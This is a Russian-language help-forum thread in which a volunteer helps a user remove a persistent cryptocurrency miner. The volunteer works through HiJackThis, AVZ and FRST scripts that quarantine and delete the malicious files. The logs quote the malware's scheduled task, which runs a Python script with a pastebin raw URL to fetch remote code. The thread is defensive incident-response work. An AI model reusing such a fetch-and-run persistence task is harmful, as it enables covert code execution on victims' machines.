trojan.vbs.miner.ak

[Vitaly Tokarenko]

Добрый день! Использовал Kaspersky free.
Режили проверить KVRT. Утилита обнаружила майнер. Удалила. После перезагрузки майнер появился на прежнем месте. Использовал загрузочный диск. Проверил, удалил. После перезагрузки файлы вернулись.

Проверка Kaspersky free ничего не находит.

Поставил пробный Total Security - ничего не нашёл.

Проверил cureit и eset с CD  - ничего не нашли.

adwcleaner - ничего не обнаружил

Подскажите, где может быть проблема? Решаема ли?

 

dvrt-data.rar

[SQ]

Здравствуйте,

«Порядок оформления запроса о помощи».

[Vitaly Tokarenko]

Прилагаю файл отчёта avz

CollectionLog-2020.04.17-18.07.zip

[SQ]

Удалите остатки от антивируса Avast утилитой Avast Remover.

 

HiJackThis профиксить

O21 - HKLM\..\ShellIconOverlayIdentifiers\00avg: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: (disabled) \Microsoft\Windows\Shell\FamilySafetyMonitorToastTask - {D2CBF5F7-5702-440B-8D8F-8203034A6B82},$(Arg0) - (no file)
O22 - Task: PythonUpdate - C:\Python34\pythonw.exe C:\ProgramData\Temporary\sound.pyw -f https://pastebin.com/raw/6VeRQtVt (file missing)

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('C:\ProgramData\Temporary\sound.pyw','');
 TerminateProcessByName('c:\windows\wmiprvsf.exe');
 QuarantineFile('c:\windows\wmiprvsf.exe','');
 DeleteFile('c:\windows\wmiprvsf.exe','32');
 DeleteSchedulerTask('PythonUpdate');
 DeleteFile('C:\ProgramData\Temporary\sound.pyw','64');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

quarantine.zip из папки AVZ загрузите этот архив через данную форму

 

- Скачайте Farbar Recovery Scan Tool  и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
• Убедитесь, что в окне Optional Scan отмечены "List BCD" и "SigCheckExt".
  
• Нажмите кнопку Scan.
• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

[Vitaly Tokarenko]

Файлы отчёта FRST

Addition.txt

FRST.txt

[SQ]

• Закройте и сохраните все открытые приложения.
• Выделите следующий код::

  Start::
  CreateRestorePoint:
  CloseProcesses:
  File: C:\Windows\DAODx.exe
  File: C:\Windows\System\HsMgr64.exe
  File: C:\Windows\SysWOW64\HsMgr.exe
  Task: {1ABE424C-FD7A-441D-AE21-963761F3F88B} - \Microsoft\Windows\SoftwareProtectionPlatform\SoftwareProtectionPTask -> No File <==== ATTENTION
  Toolbar: HKU\S-1-5-21-4221263581-88050684-563876530-1001 -> No Name - {EF293C5A-9F37-49FD-91C4-2B867063FC54} -  No File
  FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
  FF Plugin-x32: @videolan.org/vlc,version=3.0.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
  FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
  FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
  FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
  File: C:\WINDOWS\System32\OpenSSH\sshd.exe
  S3 TermService; C:\WINDOWS\System32\svchost.exe [53744 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL) <==== ATTENTION (no ServiceDLL)
  S3 TermService; C:\WINDOWS\SysWOW64\svchost.exe [45448 2019-03-19] (Microsoft Windows Publisher -> Microsoft Corporation) <==== ATTENTION (no ServiceDLL) <==== ATTENTION (no ServiceDLL)
  File: C:\Users\vv_t\.mongorc.js
  CustomCLSID: HKU\S-1-5-21-4221263581-88050684-563876530-1001_Classes\CLSID\{E36606FE-036A-4dd0-ABA9-A58F409803F0}\InprocServer32 -> no filepath
  ContextMenuHandlers1: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} =>  -> No File
  AlternateDataStreams: C:\ProgramData\TEMP:4FC01C57 [146]
  AlternateDataStreams: C:\Users\Все пользователи\TEMP:4FC01C57 [146]
  FirewallRules: [UDP Query User{A06575E4-A023-48E0-9EB1-86B16D4B6DD8}C:\program files\jetbrains\pycharm community edition 2018.2.4\bin\pycharm64.exe] => (Allow) C:\program files\jetbrains\pycharm community edition 2018.2.4\bin\pycharm64.exe No File
  FirewallRules: [TCP Query User{B9994012-ADCF-4D1B-8096-6FDA74BA9F7C}C:\program files\jetbrains\pycharm community edition 2018.2.4\bin\pycharm64.exe] => (Allow) C:\program files\jetbrains\pycharm community edition 2018.2.4\bin\pycharm64.exe No File
  FirewallRules: [{A8E42A35-2549-4FD9-B0A9-0FB22C9BD45D}] => (Allow) C:\Program Files\AVG\Antivirus\AvEmUpdate.exe No File
  FirewallRules: [{72D03B9D-5384-41C2-AEDD-938788F57D39}] => (Allow) C:\Program Files\AVG\Antivirus\AvEmUpdate.exe No File
  FirewallRules: [UDP Query User{DB3D3514-BA3F-4AA1-9363-EB6E30065313}C:\program files\tenable\nnm\nnm.exe] => (Allow) C:\program files\tenable\nnm\nnm.exe No File
  FirewallRules: [TCP Query User{FDDC48C4-275D-4A3F-AB32-CE3222E6587D}C:\program files\tenable\nnm\nnm.exe] => (Allow) C:\program files\tenable\nnm\nnm.exe No File
  FirewallRules: [UDP Query User{B1DEDEF7-8373-4B82-8FD1-9798E3F5A442}C:\program files (x86)\nmap\nmap.exe] => (Allow) C:\program files (x86)\nmap\nmap.exe No File
  FirewallRules: [TCP Query User{43B0CE30-A167-4206-958A-E7C10CED7B0C}C:\program files (x86)\nmap\nmap.exe] => (Allow) C:\program files (x86)\nmap\nmap.exe No File
  FirewallRules: [{AF805DFD-4C67-481E-9280-B67F34105D52}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe No File
  FirewallRules: [{6CE39BA8-8239-4B3A-8FDA-FC170654EF1D}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe No File
  FirewallRules: [UDP Query User{64887608-7E65-4201-86EF-D6FF6BB24590}C:\program files\java\jdk-9.0.4\bin\jmc.exe] => (Allow) C:\program files\java\jdk-9.0.4\bin\jmc.exe No File
  FirewallRules: [TCP Query User{47DBEA98-6C68-4AB9-847E-4D4E72C882B3}C:\program files\java\jdk-9.0.4\bin\jmc.exe] => (Allow) C:\program files\java\jdk-9.0.4\bin\jmc.exe No File
  FirewallRules: [UDP Query User{F1F33C91-7BA6-4CC5-9CDF-D347AF4CEA21}C:\program files\openshot video editor\launch.exe] => (Allow) C:\program files\openshot video editor\launch.exe No File
  FirewallRules: [TCP Query User{CCC11766-3EB0-4F1D-BE5B-1EF4413E5EBA}C:\program files\openshot video editor\launch.exe] => (Allow) C:\program files\openshot video editor\launch.exe No File
  FirewallRules: [UDP Query User{4BBB1B12-B79C-4588-8B7B-F31AECADB6E4}D:\eclipse\eclipse.exe] => (Allow) D:\eclipse\eclipse.exe No File
  FirewallRules: [TCP Query User{9FD6DD47-F157-4542-A105-FE6C340EF4EA}D:\eclipse\eclipse.exe] => (Allow) D:\eclipse\eclipse.exe No File
  FirewallRules: [UDP Query User{D2ED27F7-E92B-4B33-8623-B42AC5A45C33}D:\xampp\apache\bin\httpd.exe] => (Allow) D:\xampp\apache\bin\httpd.exe No File
  FirewallRules: [TCP Query User{3969679F-8104-4CC6-9001-A65080DB74E3}D:\xampp\apache\bin\httpd.exe] => (Allow) D:\xampp\apache\bin\httpd.exe No File
  FirewallRules: [UDP Query User{DBC5C5E6-FE74-4101-9B70-C21AE38C223B}D:\cloud@mail.ru\docs\3д печать\от производителя\alpha1\arduino_1.6.3(melzi)\java\bin\javaw.exe] => (Allow) D:\cloud@mail.ru\docs\3д печать\от производителя\alpha1\arduino_1.6.3(melzi)\java\bin\javaw.exe No File
  FirewallRules: [TCP Query User{D3507FBB-2E4E-4EF9-AF8D-8595969044C7}D:\cloud@mail.ru\docs\3д печать\от производителя\alpha1\arduino_1.6.3(melzi)\java\bin\javaw.exe] => (Allow) D:\cloud@mail.ru\docs\3д печать\от производителя\alpha1\arduino_1.6.3(melzi)\java\bin\javaw.exe No File
  FirewallRules: [UDP Query User{F2861CC1-20A8-414E-A230-C831B278765E}C:\users\vv_t\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\vv_t\appdata\roaming\utorrent\utorrent.exe No File
  FirewallRules: [TCP Query User{C8F5C590-4E5F-4F4C-BB29-5CE43042F4CE}C:\users\vv_t\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\vv_t\appdata\roaming\utorrent\utorrent.exe No File
  FirewallRules: [TCP Query User{EACB87F5-8E0D-4E57-B3D6-732E4867C52D}C:\program files (x86)\java\jdk1.8.0_112\bin\jmc.exe] => (Allow) C:\program files (x86)\java\jdk1.8.0_112\bin\jmc.exe No File
  FirewallRules: [UDP Query User{C7DE6DA6-C3B8-4E71-A597-E777F275053B}C:\program files (x86)\java\jdk1.8.0_112\bin\jmc.exe] => (Allow) C:\program files (x86)\java\jdk1.8.0_112\bin\jmc.exe No File
  FirewallRules: [TCP Query User{27916522-B293-49E4-A702-AE71D78EA582}D:\xampp\mysql\bin\mysqld.exe] => (Allow) D:\xampp\mysql\bin\mysqld.exe No File
  FirewallRules: [UDP Query User{DE525FAA-AFF1-4B7E-B303-F23A824B66DC}D:\xampp\mysql\bin\mysqld.exe] => (Allow) D:\xampp\mysql\bin\mysqld.exe No File
  FirewallRules: [TCP Query User{C4D553D0-EF15-422C-88B6-3EB6EC6CB99D}D:\xampp\filezillaftp\filezillaserver.exe] => (Allow) D:\xampp\filezillaftp\filezillaserver.exe No File
  FirewallRules: [UDP Query User{974C8476-E8BC-4E3B-8E63-7C977BDB89F1}D:\xampp\filezillaftp\filezillaserver.exe] => (Allow) D:\xampp\filezillaftp\filezillaserver.exe No File
  FirewallRules: [TCP Query User{C71ACDBC-CBF3-4A2E-AD33-287D6B311357}D:\xampp\mercurymail\mercury.exe] => (Allow) D:\xampp\mercurymail\mercury.exe No File
  FirewallRules: [UDP Query User{617956AC-2C63-47AC-923A-D0B47DA72961}D:\xampp\mercurymail\mercury.exe] => (Allow) D:\xampp\mercurymail\mercury.exe No File
  FirewallRules: [{E95A054C-8D72-4FD8-AE77-DD2C2123B12B}] => (Allow) C:\Users\vv_t\AppData\Roaming\Zoom\bin\airhost.exe No File
  FirewallRules: [{5A805496-23A7-422F-B597-151C154A0108}] => (Allow) C:\WINDOWS\ehome\MediaCenter\wmserver.exe No File
  FirewallRules: [{744328C4-1E92-4FA4-A728-EB195F14EB3D}] => (Allow) C:\Users\vv_t\AppData\Roaming\DRPSu\Alice\cloud.exe No File
  FirewallRules: [TCP Query User{699B6735-22DD-4A6C-B463-91895DDE7727}I:\sam19\sdi64-drv.exe] => (Allow) I:\sam19\sdi64-drv.exe No File
  FirewallRules: [UDP Query User{59EE9DBA-A187-457A-B5F8-BE4F5CBA8C43}I:\sam19\sdi64-drv.exe] => (Allow) I:\sam19\sdi64-drv.exe No File
  FirewallRules: [{BC9297F9-7C5C-4096-8034-FE40CC7AFAF4}] => (Allow) C:\Users\vv_t\AppData\Roaming\DRPSu\Alice\cloud.exe No File
  FirewallRules: [TCP Query User{D88DC126-6BB7-45C3-B0CC-550B39441485}D:\downloads\aa_v3 (1).exe] => (Allow) D:\downloads\aa_v3 (1).exe No File
  FirewallRules: [UDP Query User{8FA1985A-E051-44DA-812A-562F59E9ACB4}D:\downloads\aa_v3 (1).exe] => (Allow) D:\downloads\aa_v3 (1).exe No File
  FirewallRules: [{F4233E25-1F51-4F61-88DB-F9CA80B454CE}] => (Allow) C:\Users\vv_t\AppData\Roaming\DRPSu\Alice\cloud.exe No File
  FirewallRules: [{8C764644-187F-495C-BBE0-CE1D89DFDAC7}] => (Allow) C:\Users\vv_t\AppData\Local\Temp\DriverPack-20200329124728\tools\aria2c.exe No File
  FirewallRules: [{97DE79B7-9401-485C-B01A-CCD2D3E8219A}] => (Allow) C:\Users\vv_t\AppData\Roaming\DRPSu\Alice\cloud.exe No File
  Reboot:
  End::

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST/FRST64 (от имени администратора).
• Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). .
• Обратите внимание, что компьютер будет перезагружен.

[Vitaly Tokarenko]

Результаты FRST

Fixlog.txt

[SQ]

Сообщите, что с проблемой?

[Vitaly Tokarenko]

Добавились ещё два файла в system32. Остальное по прежнему.

 

 

[SQ]

- Покажите лог TDSSKiller
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)

P.S. При нахожение каких-то угроз, самостоятельно не удаляйте

[Vitaly Tokarenko]

К сожалению прочитал уже позже и удалил при помощи KVRT эти зловреды. Перезагрузил систему. Проверяю ещё раз. Вдруг уже не восстановятся. Результат сообщу.

Изменено 18 апреля, 2020 пользователем Vitaly Tokarenko

[Vitaly Tokarenko]

Послу удаления при помощи kvrt фиксируется только avz овская утилита.

 

TDSSKiller.3.1.0.28_18.04.2020_10.17.09_log.txt

[SQ]

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.
 

Послу удаления при помощи kvrt фиксируется только avz овская утилита.

Для исправления выполните следующее в AVZ:
"Файл/Стандартные скрипты"-> 6. Удаление всех драйверов и ключей реестра AVZ.

[Vitaly Tokarenko]

Всё удачно. Повторные проверки проблем не выявили. Не зря я многим организациям именно Касперского рекомендовал.
Теперь наверное пора и самому приобрести домой.

 

Не скажу за прочие модули, но модуль белых/чёогых списков программ это просто чудо из чудес! Только за это стоит обожать бизнес версию антивируса Касперского!

[SQ]

Послу удаления при помощи kvrt фиксируется только avz овская утилита.

Для исправления выполните следующее AVZ:

"Файл/Стандартные скрипты"-> 6. Удаление всех драйверов и ключей реестра AVZ.